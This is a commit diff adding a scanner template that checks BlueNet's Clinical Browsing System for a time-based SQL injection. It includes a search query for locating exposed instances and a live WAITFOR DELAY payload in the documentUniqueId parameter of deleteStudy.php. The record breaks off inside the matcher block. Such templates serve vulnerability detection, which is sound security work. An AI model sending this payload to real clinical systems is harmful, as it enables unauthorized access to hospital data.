minor update

patch-6
Dhiyaneshwaran 2024-07-16 01:04:59 +05:30 committed by GitHub
parent 8c3bf3a1dd
commit 52e54e6010
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 3 deletions

View File

@ -20,19 +20,32 @@ info:
metadata:
verified: true
max-request: 1
vendor: BlueNet Technology
product: Clinical Browsing System
fofa-query: app="LANWON-临床浏览系统"
tags: cve,cve2024,sqli,blunet
flow: http(1) && http(2)
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>临床浏览</title>")'
- 'contains(header,"text/html")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl: